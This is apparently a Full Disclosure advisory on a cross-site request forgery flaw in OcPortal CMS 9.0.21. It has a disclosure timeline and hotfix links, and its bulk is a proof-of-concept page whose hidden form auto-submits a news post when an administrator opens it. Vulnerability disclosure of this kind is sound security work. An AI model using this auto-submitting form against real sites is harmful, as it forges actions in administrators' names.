OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability

[CSW Research Lab <disclose () cybersecurityworks com>]

================================================================
OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
================================================================

Information
**********************

Vulnerability Type :  Cross-site Request Forgery (CSRF) Vulnerability
Vulnerable Version : 9.0.21
Severity: High
Author – Arjun Basnet
CVE-ID: N/A
Homepage: https://ocportal.com/site/sites.htm/

Description
***********************

OcPortal CMS is prone to CSRF vulnerability bypasses  referrer checks for
checking forms posted to the system. It allows an attacker to trick
administrators into submitting coded forms (i.e. coded actions) into the
system which means an attacker can add an admin user and thus gain code
execution

Proof of Concept
***************************
<!DOCTYPE>
<html lang="en">
<head>
<title>OcPortal 9.0.21 CSRF Vulnerability POC</title>
</head>
<body>
<form action="
http://localhost/ocportal/cms/index.php?page=cms_news&type=_ad&uploading=1";
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="MAX_FILE_SIZE" value="16777216" />
<input type="hidden" name="file1" value="" />
<input type="hidden" name="tick_on_form__validated" value="0" />
<input type="hidden" name="label_for__allow_rating" value="Allow rating" />
<input type="hidden" name="f_face" value="/" />
<input type="hidden" name="require__author" value="1" />
<input type="hidden" name="label_for__title" value="Title" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="label_for__meta_description" value="Concise
description" />
<input type="hidden" name="require__meta_description" value="0" />
<input type="hidden" name="validated" value="1" />
<input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" />
<input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" />
<input type="hidden" name="meta_description" value="Attack_OcPortal" />
<input type="hidden" name="allow_comments" value="1" />
<input type="hidden" name="comcode__news" value="1" />
<input type="hidden" name="http_referer" value="
http://localhost/ocportal/cms/index.php?page=cms_news&type=ad"; />
<input type="hidden" name="author" value="Attack_OcPortal" />
<input type="hidden" name="pre_f_notes" value="1" />
<input type="hidden" name="post__is_wysiwyg" value="1" />
<input type="hidden" name="label_for__file" value="Image" />
<input type="hidden" name="comcode__title" value="1" />
<input type="hidden" name="require__news_category" value="0" />
<input type="hidden" name="allow_rating" value="1" />
<input type="hidden" name="tick_on_form__allow_rating" value="0" />
<input type="hidden" name="require__allow_comments" value="0" />
<input type="hidden" name="label_for__validated" value="Validated" />
<input type="hidden" name="label_for__notes" value="Notes" />
<input type="hidden" name="label_for__post" value="News article" />
<input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" />
<input type="hidden" name="label_for__main_news_category" value="Main
category" />
<input type="hidden" name="f_size" value="" />
<input type="hidden" name="require__allow_rating" value="0" />
<input type="hidden" name="label_for__author" value="Source" />
<input type="hidden" name="require__title" value="1" />
<input type="hidden" name="comcode__post" value="1" />
<input type="hidden" name="news" value="Attack_OcPortal" />
<input type="hidden" name="post" value="Attack_OcPortal" />
<input type="hidden" name="require__validated" value="0" />
<input type="hidden" name="news__is_wysiwyg" value="1" />
<input type="hidden" name="require__notes" value="0" />
<input type="hidden" name="label_for__allow_comments" value="Allow
comments" />
<input type="hidden" name="posting_ref_id" value="13973" />
<input type="hidden" name="f_colour" value="" />
<input type="hidden" name="label_for__news" value="News summary" />
<input type="hidden" name="require__meta_keywords" value="0" />
<input type="hidden" name="notes" value="Attack_OcPortal" />
<input type="hidden" name="title" value="Attack_OcPortal" />
<input type="hidden" name="require__file" value="0" />
<input type="hidden" name="require__main_news_category" value="1" />
<input type="hidden" name="label_for__news_category" value="Secondary
categories" />
<input type="hidden" name="main_news_category" value="7" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

Severity Level:
===============
High

Vulnerable Product:
===================

[+] OcPortal CMS 9.0.21


Advisory Timeline
************************

12-Nov-2015- Reported
12-Nov-2015- Vendor released hotfix
12-Dec-2015- Public disclosed

Fixed Version:
*****************
Vendor has released the hotfix for this issue please refer below link:

[+]
http://ocportal.com/site/news/view/chris_grahams_blog/security-fix-for-csrf.htm


Reference
*****************
[+] http://ocportal.com/tracker/view.php?id=2074
[+] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Credits & Authors
**********************
Arjun Basnet from Cyber Security Works Pvt. Ltd. (
http://cybersecurityworks.com)

-- 
----------
Cheers !!!

Team CSW Research Lab <http://www.cybersecurityworks.com>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/